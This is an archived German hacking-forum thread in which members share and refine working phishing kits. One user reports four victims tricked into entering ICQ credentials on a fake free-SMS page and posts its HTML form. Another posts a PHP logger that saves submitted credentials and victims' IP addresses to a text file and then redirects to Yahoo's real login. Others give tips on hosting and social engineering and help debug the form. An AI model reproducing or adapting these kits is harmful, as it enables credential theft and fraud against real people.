PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Meine erste Phishingseite



Späßer
14.07.2009, 10:00
Hey Leute,
ich habe meine erste Phishingseite jetzt mal ins Netz gestellt.
Sie funktioniert nur mit dem Einsetzen von Social Engenering.

Ich hab bis jetzt, 4 Opfer gekriegt, indem ich ihnen gesagt hätte, man könnte auf der Seite umsonst SMS schreiben, und sie sollen es mal testen.



Bitte beachten, ich finde für Testzwecke reicht es, wenn ich mit funpic.de alles mache und dass ich mir alle eingesetzten HTML-Kenntnise innerhalb kurzer Zeit angeeignet habe;-)

Hier der Link (umsonstsms.um.funpic.de)

VeN0m
14.07.2009, 12:44
Das mit dem Social Engineering ist bei jeder Phishingseite eine gute Idee. ;)

Ich würde übrigens lieber die Scripte sehen, statt der Phishingseite selbst ;). Die Idee finde ich gut, aber wenn würde ich sehen, a) wie Du sie gemacht hast (Quellcodes) und b) würde ich sie gerne woanders hochladen (für eigene Logs). ;)

HawK
14.07.2009, 12:54
is nicht schlecht gemacht ... und so :) ich werde sie mir auch mal ansehen

@ Power-Sven (http://free-hack.com/member.php?u=52873)
ehm mit firefox quelltext anzeigen lassen ?


//BTW: Grats zum 777 Eintrag is ja mal cool hast volle schreib und lese rechte wenn man es mit FTP vergleicht :D


MFG Hawk88

kalachnikov
14.07.2009, 12:55
hier mal ein beispiel mit yahoo:

http://zion27.kilu.de/yahoo/da sieht man die logs

http://zion27.kilu.de/yahoo/topsecret.txtmein logger sieht so aus:

<?php
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://login.yahoo.com/config/mail?&.src=ym&.intl=de&.done=http://de.mail.yahoo.com");
$handle = fopen("topsecret.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>
wie man Phishing Seiten erstellt findet ihr im anderen Thread http://free-hack.com/showthread.php?t=40768

n00kie
14.07.2009, 13:01
Ja, da muss ich Power-Sven recht geben. Bei funpic und ohost bist du mit Phishing-Seiten nicht immer sicher aufgehoben. Das mit dem "SMS Umsonst - Angebot" ist prinzipiell eine gute Idee, sollte eigentlich in den meisten Fällen funktionieren. Viel mehr interessieren mich aber auch der Quellcode und die Script's.

VeN0m
14.07.2009, 13:01
Power-Sven [/B][/COLOR][/URL]
ehm mit firefox quelltext anzeigen lassen ?

Habe ich schon ;). Der HTML-Teil interessiert mich aber nur zu 50%, die anderen 50% gehen an die PHP-Scripte, die normalerweise irgendwo dabei sind ;). Die kann man ja, wie Du sicher weißt nicht einfach über den Browser einsehen (auf normale Weise).

xXxCasanova
14.07.2009, 13:04
Ganz nett gemacht aber ich würd das aussehen etwas besser machen !
wenn du hilfe brauchst kannst du mir gerne mal schreiben helfe gerne ;)
wo ich kann !

Späßer
14.07.2009, 13:30
So, als erstes mal der Code

<TABLE BORDER="0" align="center" cellspacing="0" cellpadding="0">
<TR>
<TD align="center">
<img src=YES.PNG>
</TD>
</TR>
<table>
<TR>
<TD>
<img src="Links.PNG" />
</TD>
<TD valign="center">
<p style="text-align: left">Hier bitte Daten angeben</p>
<form method="post" action="send.php">
<input type="text" name="inr" /> ICQ-Nummer <br />
<input type="password" name="pw" /> Passwort<br />
<input type="text" name="Handy Nummer" /> Empfänger's Handynummer<br />
<textarea rows="4" cols="30" name="message"></textarea> <br>
<input type="Submit" value="Schicken" />
</form>
</TD>
</TR>
</table>
<TR>
<TD align="center">
<img src=UntererTeil.PNG>
</TD>
</TR>
</TABLE>


Naja, ihr könnt es ja mal testen mit euren ICQ-Daten;-)



Meine einzigste Frage ist, wie ich mein "Eingabefeld" mittiger positionieren kann?

Gruß

kalachnikov
14.07.2009, 13:32
anstatt post muss der GET parameter hin.

VeN0m
14.07.2009, 13:33
Meine einzigste Frage ist, wie ich mein "Eingabefeld" mittiger positionieren kann?




<TD valign="center">


valign = vertical-align. Das ist die Richtung nach oben oder unten. Was Du suchst ist text-align ;). Und das halt auf center. Dann sollte es mittig positioniert sein.

n00kie
14.07.2009, 13:43
anstatt post muss der GET parameter hin.
Warum sollte es? Die Daten werden doch an die "send.php" gesendet, da ist ein POST-Parameter nötig. Außerdem arbeite ich hier nicht mit PHP_SELF.

kalachnikov
14.07.2009, 13:45
Wenn der POST-PArameter da steht, werden die Logs an die "send.php" nicht gesendet!

VeN0m
14.07.2009, 13:50
Doch. Wenn als action des Formulars eine Datei angegeben ist wird, egal mit welcher Methode das Formular an diese Datei gesendet. Dort kannst Du dann per $_POST die Werte abfragen. Funktioniert genauso, wie mit GET nur unsichtbar.

Späßer
14.07.2009, 13:50
anstatt post muss der GET parameter hin.
Öhm, wie jetzt?!:D




und, Powersven, so wie du es aber schreibst drüfte es doch nur in der Zelle mittig sein, oder?

VeN0m
14.07.2009, 13:53
Das mit dem "wie jetzt" kannst Du Dir sparen. Post ist schon richtig ;).

Naja halt mittig dort, wo Du es haben möchtest. Du kannst es ja auch noch in ein Div hauen (also das ganze Formular) oder dergleichen. Es gibt genügend Methoden dafür, etwas mittig zu platzieren ;). Ich denke mal, Du meinst mittig innerhalb des Bildschirms. Dann wäre es wirklich sinnvoll, den Tabelleninhalt mittig zu platzieren.

EDIT: Oder mach das TD breiter und gib ihm dann text-align:center. Bei mir geht es auf die Methode (Firebug).

Späßer
14.07.2009, 13:57
okay, danke, werde es heut abend mal probieren und dann rückmeldung geben

kalachnikov
14.07.2009, 14:13
ok. in dem falle kann man auch den POST benutzen indem man durch $_POST abfragt.
aber man spart sich jegliche Komplexität indem man einfach den GET-Parameter benutzt.
Anfänger wissen damit meist nix anzufangen. Deshalb um möglichst wenig am quellcode zu ändern einfach statt post get eintragen.
Aber Power-Sven hat schon recht du kannst das auch so machen wie er´s beschrieben hat. ;)